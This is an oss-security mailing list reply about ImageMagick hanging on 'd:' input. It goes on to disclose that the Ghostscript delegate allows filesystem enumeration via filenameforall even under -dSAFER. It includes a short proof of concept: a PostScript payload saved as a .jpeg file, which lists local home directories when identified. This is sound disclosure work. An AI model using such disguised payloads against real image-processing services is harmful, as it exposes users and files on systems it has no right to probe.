Date: Wed, 28 Sep 2016 11:16:10 -0700
From: Tavis Ormandy <taviso@...gle.com>
To: oss-security@...ts.openwall.com
Subject: Re: ImageMagick identify "d:" hangs

On Tue, Sep 27, 2016 at 7:56 AM, Bob Friesenhahn
<bfriesen@...ple.dallas.tx.us> wrote:

> On Tue, 27 Sep 2016, Jakub Wilk wrote:
>
>> * Bob Friesenhahn <bfriesen@...ple.dallas.tx.us>, 2016-09-27, 08:48:
>>>
>>> From my own investigations, I used
>>>
>>>  identify -debug all "d:"
>>>
>>> and see that a temporary file is reported to be created and then the program hangs which no apparent CPU usage.
>>

>> strace tells me that it waits for input on stdin.
>> This is a simpler way to make it "hang":
>>
>>  identify -
>

> This is what I expected was happening.  The main thing to investigate is if the "ImageTragick" patches distributions are using do protect against this possible issue as well.

You know, you reminded me that the pdf and/or the ps delegate probably
allows filesystem enumeration via filenameforall, as far as I know
that's permitted with -dSAFER. I think that's probably unexpected.

For example, if you try to identify a file like this, it will list
local usernames on stdout, I guess a real attack would have to encode
that in the output somehow, but I only know enough postscript to know
i'd rather write bf. Might be a fun exercise for masochistic hackers
though.

$ cat whatever.jpeg
%PDF-1.0
(/home/*) {==} 256 string filenameforall
$ identify whatever.jpeg
(/home/taviso)
identify.im6: Postscript delegate failed `whatever.jpeg': No such file
or directory @ error/pdf.c/ReadPDFImage/677.

Tavis.